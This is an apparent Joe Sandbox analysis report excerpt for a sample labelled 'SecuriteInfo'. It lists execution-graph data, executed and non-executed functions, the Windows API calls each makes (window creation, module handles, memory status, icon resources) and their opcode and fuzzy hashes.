25896->25899 25904 4bb09c0 25896->25904 25900 4bb09c0 25899->25900 25901 4bb0a9a 25900->25901 25909 4bb1891 25900->25909 25914 4bb18a0 25900->25914 25905 4bb09eb 25904->25905 25906 4bb0a9a 25905->25906 25907 4bb1891 2 API calls 25905->25907 25908 4bb18a0 2 API calls 25905->25908 25907->25906 25908->25906 25910 4bb18a0 25909->25910 25912 4bb18f0 CreateWindowExW 25910->25912 25913 4bb18e4 CreateWindowExW 25910->25913 25911 4bb18d5 25911->25901 25912->25911 25913->25911 25916 4bb18f0 CreateWindowExW 25914->25916 25917 4bb18e4 CreateWindowExW 25914->25917 25915 4bb18d5 25915->25901 25916->25915 25917->25915 25918 9dacf0 25922 9dadd9 25918->25922 25927 9dade8 25918->25927 25919 9dacff 25923 9dadf9 25922->25923 25924 9dae1c 25922->25924 25923->25924 25925 9db020 GetModuleHandleW 25923->25925 25924->25919 25926 9db04d 25925->25926 25926->25919 25928 9dae1c 25927->25928 25929 9dadf9 25927->25929 25928->25919 25929->25928 25930 9db020 GetModuleHandleW 25929->25930 25931 9db04d 25930->25931 25931->25919

                                                              Executed Functions

                                                              Function 009DADE8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 370 9dade8-9dadf7 371 9dadf9-9dae06 call 9d9414 370->371 372 9dae23-9dae27 370->372 378 9dae1c 371->378 379 9dae08 371->379 374 9dae29-9dae33 372->374 375 9dae3b-9dae7c 372->375 374->375 381 9dae7e-9dae86 375->381 382 9dae89-9dae97 375->382 378->372 425 9dae0e call 9db080 379->425 426 9dae0e call 9db070 379->426 381->382 383 9dae99-9dae9e 382->383 384 9daebb-9daebd 382->384 387 9daea9 383->387 388 9daea0-9daea7 call 9da150 383->388 386 9daec0-9daec7 384->386 385 9dae14-9dae16 385->378 389 9daf58-9db018 385->389 392 9daec9-9daed1 386->392 393 9daed4-9daedb 386->393 390 9daeab-9daeb9 387->390 388->390 420 9db01a-9db01d 389->420 421 9db020-9db04b GetModuleHandleW 389->421 390->386 392->393 396 9daedd-9daee5 393->396 397 9daee8-9daef1 call 9da160 393->397 396->397 401 9daefe-9daf03 397->401 402 9daef3-9daefb 397->402 403 9daf05-9daf0c 401->403 404 9daf21-9daf2e 401->404 402->401 403->404 406 9daf0e-9daf1e call 9da170 call 9da180 403->406 411 9daf51-9daf57 404->411 412 9daf30-9daf4e 404->412 406->404 412->411 420->421 422 9db04d-9db053 421->422 423 9db054-9db068 421->423 422->423 425->385 426->385
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 009DB03E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088113624.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_9d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 06131dd9a15051438a86f852a5db4c952984efef68cbb19b4bc0a28f8eea63ea
                                                              • Instruction ID: 47c91cf1a4f1380e1384793d013eaa07aebd1bc46380c5747ae1bf63d8de08e7
                                                              • Opcode Fuzzy Hash: 06131dd9a15051438a86f852a5db4c952984efef68cbb19b4bc0a28f8eea63ea
                                                              • Instruction Fuzzy Hash: 57713270A00B058FD724DF69D44575ABBF5FF88300F008A2AE44AD7B50DB34E95ACBA1
                                                              Function 04BB18E4 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 427 4bb18e4-4bb1956 428 4bb1958-4bb195e 427->428 429 4bb1961-4bb1968 427->429 428->429 430 4bb196a-4bb1970 429->430 431 4bb1973-4bb1a12 CreateWindowExW 429->431 430->431 433 4bb1a1b-4bb1a53 431->433 434 4bb1a14-4bb1a1a 431->434 438 4bb1a60 433->438 439 4bb1a55-4bb1a58 433->439 434->433 440 4bb1a61 438->440 439->438 440->440
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BB1A02
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2100770882.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bb0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: f770fac86ceaecc9a49e3ad562839c01202032b6940f78556504eefc3a9df443
                                                              • Instruction ID: 13a0934d2000afe553d5a5b1e53d0bcf2349f9317bb1814713c4fb6009c3a308
                                                              • Opcode Fuzzy Hash: f770fac86ceaecc9a49e3ad562839c01202032b6940f78556504eefc3a9df443
                                                              • Instruction Fuzzy Hash: 8F51E2B1D00349DFDB14CF99C894ADEBBB5FF48300F24816AE418AB210D774A986CF90
                                                              Function 04BB18F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 441 4bb18f0-4bb1956 442 4bb1958-4bb195e 441->442 443 4bb1961-4bb1968 441->443 442->443 444 4bb196a-4bb1970 443->444 445 4bb1973-4bb1a12 CreateWindowExW 443->445 444->445 447 4bb1a1b-4bb1a53 445->447 448 4bb1a14-4bb1a1a 445->448 452 4bb1a60 447->452 453 4bb1a55-4bb1a58 447->453 448->447 454 4bb1a61 452->454 453->452 454->454
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BB1A02
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2100770882.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bb0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 801a90e4cdc8ad944ce91055ca35e53157ea89d0382036f2d498b11b0ba86a5c
                                                              • Instruction ID: ba9c254868ed30d29e26b69344491483b2ce292180bedcc315d97df896f5c6fb
                                                              • Opcode Fuzzy Hash: 801a90e4cdc8ad944ce91055ca35e53157ea89d0382036f2d498b11b0ba86a5c
                                                              • Instruction Fuzzy Hash: 7241D2B1D00349DFDB14CF99C994ADEBBB5FF48350F24826AE818AB250D774A985CF90
                                                              Function 009D590C Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 455 9d590c-9d5916 456 9d5918-9d59d9 CreateActCtxA 455->456 458 9d59db-9d59e1 456->458 459 9d59e2-9d5a3c 456->459 458->459 466 9d5a3e-9d5a41 459->466 467 9d5a4b-9d5a4f 459->467 466->467 468 9d5a51-9d5a5d 467->468 469 9d5a60 467->469 468->469 471 9d5a61 469->471 471->471
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 009D59C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088113624.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_9d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: de9ae3fc9e5212da173cbbdddcfdb5ef67dd7486f283fcef4c7d1acd084afde7
                                                              • Instruction ID: 737a3d2355655fc5309485c525440ac25e071bfcfb1245badc7f2a082234c378
                                                              • Opcode Fuzzy Hash: de9ae3fc9e5212da173cbbdddcfdb5ef67dd7486f283fcef4c7d1acd084afde7
                                                              • Instruction Fuzzy Hash: 8B41F2B1C00719CFDB24DFA9C884B9EBBB5BF48304F20806AD408AB251DB756986CF90
                                                              Function 009D44D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 472 9d44d4-9d59d9 CreateActCtxA 475 9d59db-9d59e1 472->475 476 9d59e2-9d5a3c 472->476 475->476 483 9d5a3e-9d5a41 476->483 484 9d5a4b-9d5a4f 476->484 483->484 485 9d5a51-9d5a5d 484->485 486 9d5a60 484->486 485->486 488 9d5a61 486->488 488->488
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 009D59C9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088113624.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_9d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 40c67c310d4a35f64f8c07de78322790c8ec24cc70b13803e87eb754ddca9eab
                                                              • Instruction ID: 83573bd398bb8fe699208366b32d548255fd6331d99172bb957ad1140c36fcbe
                                                              • Opcode Fuzzy Hash: 40c67c310d4a35f64f8c07de78322790c8ec24cc70b13803e87eb754ddca9eab
                                                              • Instruction Fuzzy Hash: CF41DFB1C00B19CFDB24DFA9C884B9EBBB5FF49304F20816AD408AB255DB756946CF90
                                                              Function 04BB4050 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 489 4bb4050-4bb408c 490 4bb413c-4bb415c 489->490 491 4bb4092-4bb4097 489->491 497 4bb415f-4bb416c 490->497 492 4bb40ea-4bb4122 CallWindowProcW 491->492 493 4bb4099-4bb40d0 491->493 495 4bb412b-4bb413a 492->495 496 4bb4124-4bb412a 492->496 499 4bb40d9-4bb40e8 493->499 500 4bb40d2-4bb40d8 493->500 495->497 496->495 499->497 500->499
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04BB4111
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2100770882.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bb0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: 1be41663ce5f61f81be145547b6d6434e67e621dabbb347700769cb95b4e5d9e
                                                              • Instruction ID: 4de5649fa471140091dca91ea17c09f38e0e201c9534cfcbc1ed4b9b438ac312
                                                              • Opcode Fuzzy Hash: 1be41663ce5f61f81be145547b6d6434e67e621dabbb347700769cb95b4e5d9e
                                                              • Instruction Fuzzy Hash: 67413CB9900315DFDB14DF99C448AAABBF5FF88314F24C499D559AB322D374A841CFA0
                                                              Function 009DD6B8 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 503 9dd6b8-9dd754 DuplicateHandle 504 9dd75d-9dd77a 503->504 505 9dd756-9dd75c 503->505 505->504
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,009DD686,?,?,?,?,?), ref: 009DD747
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088113624.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_9d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: c87c0b1885226c70401c45f5ad1eeca2a96d0b6a9da9ccabb9ca793e138ee704
                                                              • Instruction ID: 134dfce3a84b39eb2faa1472425490ccdd4786459dfe618dc4c8e94a63204dcb
                                                              • Opcode Fuzzy Hash: c87c0b1885226c70401c45f5ad1eeca2a96d0b6a9da9ccabb9ca793e138ee704
                                                              • Instruction Fuzzy Hash: C521F5B5901248AFDB10CFAAD584ADEFFF4FB48310F14805AE918A7350C378A945CFA1
                                                              Function 009DB7D0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 508 9db7d0-9dd754 DuplicateHandle 510 9dd75d-9dd77a 508->510 511 9dd756-9dd75c 508->511 511->510
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,009DD686,?,?,?,?,?), ref: 009DD747
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088113624.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_9d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 0f49af8756535875219729a6ba4bb2f34f32700328dec99ea0f7fa6212f7dd7e
                                                              • Instruction ID: 58c9d68d58e4caa46793b52939ca2687a05a235ef917eb995385d7382824dfb4
                                                              • Opcode Fuzzy Hash: 0f49af8756535875219729a6ba4bb2f34f32700328dec99ea0f7fa6212f7dd7e
                                                              • Instruction Fuzzy Hash: BB21E3B59012489FDB10CF9AD584AEEBBF8EB48310F14845AE918A3350D379A954CFA5
                                                              Function 009DAFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 514 9dafd8-9db018 515 9db01a-9db01d 514->515 516 9db020-9db04b GetModuleHandleW 514->516 515->516 517 9db04d-9db053 516->517 518 9db054-9db068 516->518 517->518
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 009DB03E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088113624.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_9d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 94097b7a2d7e85336685d408e5c74d16ad9314571fa676133b9deebe0ef646cd
                                                              • Instruction ID: b05a542bd8956cedea86a5168fb2c7ffc334c8ff2ab17cd879339196b69a8b51
                                                              • Opcode Fuzzy Hash: 94097b7a2d7e85336685d408e5c74d16ad9314571fa676133b9deebe0ef646cd
                                                              • Instruction Fuzzy Hash: 2211FDB68002498ECB20CF9AC444A9EFBF8AB88310F10C41AD928A7200D379A545CFA1
                                                              Function 0084D4C4 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2087688224.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_84d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 42c018a1498e343b65f6c3ae221a5509e36520228a857c3764821ef2d7986ed5
                                                              • Instruction ID: 9ce936324b225543cb8678a55641e9c676f069dd53402a11fd73340ad3b7373d
                                                              • Opcode Fuzzy Hash: 42c018a1498e343b65f6c3ae221a5509e36520228a857c3764821ef2d7986ed5
                                                              • Instruction Fuzzy Hash: 19212271600348DFCB05DF14D9C0F26BF65FB98318F20C5A9E9098B256C73AD816DBA2
                                                              Function 0085D1D4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2087741106.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_85d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 21ff6332afd62a1287ea3b6c26d99e9de291b90c3f9a58852c049386fe31865e
                                                              • Instruction ID: 155837390ba5a8c03b5f8a74d4a367b8aa869c907e7a6acba6d11b4e401084e7
                                                              • Opcode Fuzzy Hash: 21ff6332afd62a1287ea3b6c26d99e9de291b90c3f9a58852c049386fe31865e
                                                              • Instruction Fuzzy Hash: AF21F571504304DFDB25DF14D5C0B26BB65FB84315F20C56DDD098B356C37AE84ACA61
                                                              Function 0085D01C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2087741106.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_85d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6cc5eb7d98cf653928ddd01ca180fb4101cd2b98ad094be91e85e35a95a70354
                                                              • Instruction ID: d8408795b670b42f2408acc4315073145238bcdca2b6718bad8ae25104a8ba05
                                                              • Opcode Fuzzy Hash: 6cc5eb7d98cf653928ddd01ca180fb4101cd2b98ad094be91e85e35a95a70354
                                                              • Instruction Fuzzy Hash: 1121D075604704DFDB24DF24D984B26BF65FB88315F20C569DD0A8B396C33AD80BCA62
                                                              Function 0085D005 Relevance: .1, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2087741106.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_85d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c55c053b3fa8cffe3d98f909fc5e2a42ff41c9bdb003bbba4f1c342e48cb59c
                                                              • Instruction ID: 8de537fc77c2dc7482be5ccd4b8304bc76d4608a3d1dd90a2221d607a2ae3405
                                                              • Opcode Fuzzy Hash: 5c55c053b3fa8cffe3d98f909fc5e2a42ff41c9bdb003bbba4f1c342e48cb59c
                                                              • Instruction Fuzzy Hash: 13219F755097808FDB12CF24D994B15BF71FB46314F28C5EADC498B6A7C33A980ACB62
                                                              Function 0084D4BF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2087688224.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_84d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: 919d050fd0c2101e9ed56f76aeda8f92b22ce4584cef3a7290c1edecfa6a6777
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: 5A112672504384CFCB02CF10D5C4B16BF71FB98318F24C6A9D8494B256C336D85ACBA2
                                                              Function 0085D1CF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2087741106.000000000085D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0085D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_85d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: b787d49a640874b6f68aaa400d6e20589560022cce72140e3fc1ab2142d39e06
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: F0118B75504380DFDB16CF14D5C4B15BBA2FB84314F24C6ADDC498B696C33AE84ACB62
                                                              Function 0084D745 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2087688224.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_84d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39d4f24d21186c1cb169503486118cf6759985478201f8cee5b463b9ae4daa5a
                                                              • Instruction ID: 9d67b66271a5053b8a1dec08880dbdf37499cb3e14412b0c1ecf3966e94cd6c7
                                                              • Opcode Fuzzy Hash: 39d4f24d21186c1cb169503486118cf6759985478201f8cee5b463b9ae4daa5a
                                                              • Instruction Fuzzy Hash: 6501DB710053489EE7209F19CD88B67BF9CFF55364F18C56AED098A286D2799841CA71
                                                              Function 0084D744 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2087688224.000000000084D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0084D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_84d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6835e1894bec6dddbb8bce223daf7fd5ccd918e13d8eda6a9e1319bc30735343
                                                              • Instruction ID: 19e4c1a35f280e13e16a13bd76d6bc838544585d38577ca0dad5fc0261c5ef15
                                                              • Opcode Fuzzy Hash: 6835e1894bec6dddbb8bce223daf7fd5ccd918e13d8eda6a9e1319bc30735343
                                                              • Instruction Fuzzy Hash: 85F096714053449EE7208E1ACD88B66FFA8FF55734F18C45AED485B386C2799C45CBB1

                                                              Non-executed Functions

                                                              Function 04BB0040 Relevance: .3, Instructions: 315COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2100770882.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bb0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2594a6eaf5eb84eee48beeb81a991cc63a9859f52de5350a328c0f52ee584f53
                                                              • Instruction ID: 8fa049f0f856ec3ffe36edbfdd5d8ad6113f9ab695438730c3a9e92f1de55c2d
                                                              • Opcode Fuzzy Hash: 2594a6eaf5eb84eee48beeb81a991cc63a9859f52de5350a328c0f52ee584f53
                                                              • Instruction Fuzzy Hash: C81293B042AF468BE710CF65ED4C1A93BB1BB41328F534209D3A66B2F5DBB4154AEF44
                                                              Function 009DD3A4 Relevance: .3, Instructions: 264COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2088113624.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_9d0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ff7498fe64d5afdd92cebd191feb78fe2c777f291ab862a2381b20e96550bbd4
                                                              • Instruction ID: d34842146ed50de1b68fd6f16d9ed19aa62592168ba22613225a61bb5c4c37b1
                                                              • Opcode Fuzzy Hash: ff7498fe64d5afdd92cebd191feb78fe2c777f291ab862a2381b20e96550bbd4
                                                              • Instruction Fuzzy Hash: 04A16B36E402098FCF05DFB4C8515AEBBB6FF85300B15857AE906AB366DB71E916CB40
                                                              Function 04BB0006 Relevance: .2, Instructions: 234COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2100770882.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4bb0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a41a8b20cee6e4e56b83d1390cae0f283dea3459a331db1296085928beedc18c
                                                              • Instruction ID: 6a92251935c4816c7c4655e585ff0cb0c499022aba4519a5670155b025e08f2c
                                                              • Opcode Fuzzy Hash: a41a8b20cee6e4e56b83d1390cae0f283dea3459a331db1296085928beedc18c
                                                              • Instruction Fuzzy Hash: 02C1F8B082AF468FD711CF65EC481A97BB1BB85318F534209D3A26B2F5DBB4144AEF44

                                                              Execution Graph

                                                              Execution Coverage:14%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:591
                                                              Total number of Limit Nodes:50
                                                              execution_graph 42535 6783558 42536 678355c 42535->42536 42539 67837e8 42536->42539 42545 67836cf 42536->42545 42540 67837bf 42539->42540 42541 67837e6 42540->42541 42551 67838a0 42540->42551 42555 67838c0 42540->42555 42559 67838d0 42540->42559 42541->42536 42547 67836d6 42545->42547 42546 67837e6 42546->42536 42547->42546 42548 67838d0 3 API calls 42547->42548 42549 67838c0 3 API calls 42547->42549 42550 67838a0 3 API calls 42547->42550 42548->42547 42549->42547 42550->42547 42552 67838af 42551->42552 42552->42540 42563 6784128 42552->42563 42553 67839d5 42556 67838c7 42555->42556 42558 6784128 3 API calls 42556->42558 42557 67839d5 42558->42557 42560 67838f5 42559->42560 42562 6784128 3 API calls 42560->42562 42561 67839d5 42562->42561 42564 678414d 42563->42564 42567 6781d18 42564->42567 42566 67843e7 42566->42553 42568 6781d3c 42567->42568 42571 6781f08 42568->42571 42569 6781d9e 42569->42566 42575 6781f50 42571->42575 42583 6781f40 42571->42583 42572 6781f26 42572->42569 42576 6781f5d 42575->42576 42577 6781f85 42575->42577 42576->42572 42591 6781440 42577->42591 42579 6781fa6 42579->42572 42581 678206e GlobalMemoryStatusEx 42582 678209e 42581->42582 42582->42572 42584 6781f5d 42583->42584 42585 6781f85 42583->42585 42584->42572 42586 6781440 GlobalMemoryStatusEx 42585->42586 42588 6781fa2 42586->42588 42587 6781fa6 42587->42572 42588->42587 42589 678206e GlobalMemoryStatusEx 42588->42589 42590 678209e 42589->42590 42590->42572 42592 6782028 GlobalMemoryStatusEx 42591->42592 42594 6781fa2 42592->42594 42594->42579 42594->42581 42595 118d0fc 42596 118d114 42595->42596 42597 118d16e 42596->42597 42603 5435358 CallWindowProcW 42596->42603 42604 5436c93 42596->42604 42608 5433690 42596->42608 42612 5435970 42596->42612 42616 5435850 42596->42616 42622 5435840 42596->42622 42603->42597 42605 5436ccd 42604->42605 42606 54354a4 CallWindowProcW 42605->42606 42607 5436cf1 42605->42607 42606->42607 42609 543369b 42608->42609 42628 5435384 42609->42628 42611 5435987 42611->42597 42613 5435980 42612->42613 42614 5435384 10 API calls 42613->42614 42615 5435987 42614->42615 42615->42597 42617 5435876 42616->42617 42618 5433690 10 API calls 42617->42618 42619 5435882 42618->42619 42620 5435358 CallWindowProcW 42619->42620 42621 5435897 42620->42621 42621->42597 42623 5435850 42622->42623 42624 5433690 10 API calls 42623->42624 42625 5435882 42624->42625 42626 5435358 CallWindowProcW 42625->42626 42627 5435897 42626->42627 42627->42597 42629 543538f 42628->42629 42630 54332b0 10 API calls 42629->42630 42631 5435ce1 42630->42631 42632 5435f0e 42631->42632 42633 54358b0 SetWindowLongW 42631->42633 42633->42632 42056 5457840 42057 5457841 42056->42057 42060 54578bb 42057->42060 42061 5453c50 42057->42061 42063 5453c5b 42061->42063 42062 54578b4 42063->42062 42066 54593d8 42063->42066 42072 54593e8 42063->42072 42078 5457ee4 42066->42078 42068 545940f 42068->42062 42070 5459439 CreateIconFromResourceEx 42071 54594b6 42070->42071 42071->42062 42073 5457ee4 CreateIconFromResourceEx 42072->42073 42075 5459402 42072->42075 42073->42075 42074 545940f 42074->42062 42075->42074 42076 5459439 CreateIconFromResourceEx 42075->42076 42077 54594b6 42076->42077 42077->42062 42079 5459438 CreateIconFromResourceEx 42078->42079 42081 5459402 42079->42081 42081->42068 42081->42070 42082 5438c0b 42085 54354a4 42082->42085 42084 5438c1a 42086 54354af 42085->42086 42087 5438cca CallWindowProcW 42086->42087 42088 5438c79 42086->42088 42087->42088 42088->42084 42634 543c228 42635 543c530 42634->42635 42636 543c250 42634->42636 42637 543c259 42636->42637 42638 543a9f4 OleInitialize 42636->42638 42639 543c27c 42638->42639 42089 11d7410 42090 11d7456 GetCurrentProcess 42089->42090 42092 11d74a8 GetCurrentThread 42090->42092 42093 11d74a1 42090->42093 42094 11d74de 42092->42094 42095 11d74e5 GetCurrentProcess 42092->42095 42093->42092 42094->42095 42098 11d751b 42095->42098 42096 11d7543 GetCurrentThreadId 42097 11d7574 42096->42097 42098->42096 42099 5451048 